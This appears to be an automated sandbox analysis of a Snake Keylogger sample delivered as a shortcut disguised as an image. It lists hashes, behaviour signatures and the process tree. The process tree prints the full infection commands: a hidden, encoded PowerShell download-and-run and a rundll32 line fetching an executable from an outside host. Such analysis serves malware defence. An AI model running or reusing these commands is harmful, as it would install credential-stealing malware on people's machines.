Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
31/01/2024, 08:13
Static task
static1
Behavioral task
behavioral1
Sample
Image012.png.lnk
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Image012.png.lnk
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
Photo01.jpg.lnk
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
Photo01.jpg.lnk
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
Photo02.jpg.lnk
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
Photo02.jpg.lnk
Resource
win10v2004-20231215-en
General
-
Target
Image012.png.lnk
-
Size
2KB
-
MD5
395be4940bf35809d5bcfe58646b278c
-
SHA1
02b01088e3bb584641281c36118c930f3c9b963d
-
SHA256
4c5fe2c863349aa4f43dd9f9f932dac11576832a12bc5e84b840c09c1308f540
-
SHA512
9add65f4de5ef386b7191ac869ca1801dcdd9525189fdb94a5d86c82c4c51d983e3966ef148f392d48382588ed8882ea25120dcbd6bc8d8a7e63e362e6b2929b
Malware Config
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 16 IoCs
resource yara_rule behavioral2/memory/4128-44-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-45-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-46-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-47-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-53-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-57-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-55-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-61-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-67-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-68-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-69-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-70-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-71-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/4128-75-0x0000000000690000-0x0000000000790000-memory.dmp family_snakekeylogger behavioral2/memory/964-76-0x0000000000400000-0x000000000042B000-memory.dmp family_snakekeylogger behavioral2/memory/964-83-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 2 IoCs
flow pid Process 8 4184 powershell.exe 19 1188 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 4128 jertrs[1].exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 25 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4128 set thread context of 964 4128 jertrs[1].exe 114 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2148 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 5116 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" rundll32.exe -
Modifies registry class 16 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Extensible Cache rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheLimit = "1" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\MuiCache rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheLimit = "51200" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheVersion = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheVersion = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheVersion = "1" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheLimit = "1" rundll32.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4184 powershell.exe 4184 powershell.exe 964 regasm.exe 964 regasm.exe 964 regasm.exe 964 regasm.exe 964 regasm.exe 964 regasm.exe 964 regasm.exe 964 regasm.exe 964 regasm.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4128 jertrs[1].exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4184 powershell.exe Token: SeDebugPrivilege 5116 taskkill.exe Token: SeDebugPrivilege 964 regasm.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4464 rundll32.exe 1188 rundll32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4128 jertrs[1].exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 3852 wrote to memory of 1676 3852 cmd.exe 87 PID 3852 wrote to memory of 1676 3852 cmd.exe 87 PID 1676 wrote to memory of 4184 1676 cmd.exe 89 PID 1676 wrote to memory of 4184 1676 cmd.exe 89 PID 4184 wrote to memory of 3168 4184 powershell.exe 93 PID 4184 wrote to memory of 3168 4184 powershell.exe 93 PID 3168 wrote to memory of 2376 3168 cmd.exe 94 PID 3168 wrote to memory of 2376 3168 cmd.exe 94 PID 3168 wrote to memory of 4464 3168 cmd.exe 95 PID 3168 wrote to memory of 4464 3168 cmd.exe 95 PID 4464 wrote to memory of 220 4464 rundll32.exe 96 PID 4464 wrote to memory of 220 4464 rundll32.exe 96 PID 3168 wrote to memory of 2356 3168 cmd.exe 98 PID 3168 wrote to memory of 2356 3168 cmd.exe 98 PID 3168 wrote to memory of 1188 3168 cmd.exe 99 PID 3168 wrote to memory of 1188 3168 cmd.exe 99 PID 2356 wrote to memory of 2328 2356 cmd.exe 101 PID 2356 wrote to memory of 2328 2356 cmd.exe 101 PID 2356 wrote to memory of 2148 2356 cmd.exe 102 PID 2356 wrote to memory of 2148 2356 cmd.exe 102 PID 2356 wrote to memory of 5116 2356 cmd.exe 108 PID 2356 wrote to memory of 5116 2356 cmd.exe 108 PID 3168 wrote to memory of 5104 3168 cmd.exe 110 PID 3168 wrote to memory of 5104 3168 cmd.exe 110 PID 3168 wrote to memory of 5060 3168 cmd.exe 111 PID 3168 wrote to memory of 5060 3168 cmd.exe 111 PID 5060 wrote to memory of 4128 5060 conhost.exe 112 PID 5060 wrote to memory of 4128 5060 conhost.exe 112 PID 5060 wrote to memory of 4128 5060 conhost.exe 112 PID 4128 wrote to memory of 964 4128 jertrs[1].exe 114 PID 4128 wrote to memory of 964 4128 jertrs[1].exe 114 PID 4128 wrote to memory of 964 4128 jertrs[1].exe 114 PID 4128 wrote to memory of 964 4128 jertrs[1].exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Image012.png.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" Cmd /C pOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g2⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4184 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\system32\DeviceCredentialDeployment.exeDEVIcECRedentIALdEPLOymEnt5⤵PID:2376
-
-
C:\Windows\system32\rundll32.exeRUNDll32 inEtcpL.CPl , ClearMyTracksByProcess 85⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:00000000000000006⤵
- Modifies registry class
PID:220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT5⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\system32\DeviceCredentialDeployment.exedEvicEcredeNTiAldEPlOYMeNT6⤵PID:2328
-
-
C:\Windows\system32\timeout.exetimEout /T 7 /nObREAK6⤵
- Delays execution with timeout.exe
PID:2148
-
-
C:\Windows\system32\taskkill.exeTAskkilL.Exe /F /Im rUNdlL32.exE6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
-
C:\Windows\system32\rundll32.exerundLl32 C:\Windows\sYStEm32\SHiMGVW.dLl , ImageView_FullscreenA http://vybsnf3.sa.com/jertrs.exe5⤵
- Blocklisted process makes network request
- Suspicious use of FindShellTrayWindow
PID:1188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c DIr C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\ /s /B5⤵PID:5104
-
-
C:\Windows\system32\conhost.exeCoNhOsT C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe5⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exeC:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"7⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:964
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD5b07832ec5f73ae5f2888ebab2aa5283a
SHA1cb11a9e432df439fde94b6a3b3677d0112cac3c5
SHA256dc613f5e91169b3744adfc0f6c968e3501c4bc1221ce12bdaa948ce9e5a1da21
SHA5127a3233303f57b57e72eaabd792796339611daa39bea2279ff1879a2728afc3b6cbb25cb9b66f96f86deda3aa7fda95cab07f0a549981dddbbb4f71c25132da15
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
552B
MD5885e4bf9c36d1964f751bca33e898503
SHA14055100dda8ee3845cfda6735900c556d8c19ca1
SHA2565efe4bb30df918412651e2060b234aac78f108793c2a25500aca8488ada3ab2a
SHA5125da165cb4571777b53fbf324dabd63e73b7af94a88d0b08da8a0d28db1f6b947ad41494331be734836d2b5cb7ef090f1eed1e73b8ed9deb2fb9a37c4873691e3
-
Filesize
88B
MD539aceb0c8a015a4e8f66498e03ff16db
SHA14707695dece3a70bfbe55868d059a22e4325eaf0
SHA2567eec1caeee2e9781635bc00daf1c0dbf98ec325625776afc4fb621e2eabd4527
SHA5120cc87584d277036c2f94f25484beeb60b07adcb1ccc90b6ddfc1e6521944c35f87cc2c9f15a2b2b453a1cd8e9c0c16ade7d6ceb4f6b082c4be6f8d1aaf8a53dc
-
Filesize
331KB
MD5ec5031625d0458f61b9ce0b9115e9b24
SHA1bf4e8ad7bfa02fb651b5afb75bcfe2f0e75978b9
SHA256255275e570fe7745e01411f4793511b19f5a8562ea85f92160793592136520d3
SHA5127323beb6ddf25c8ead15f565895cc86f4514ef2f3cf25df2672b1df3c5a6fc22987a258a7ded375d942ebab1afc079c1d145db0b60767c98667d04e1840d5fc3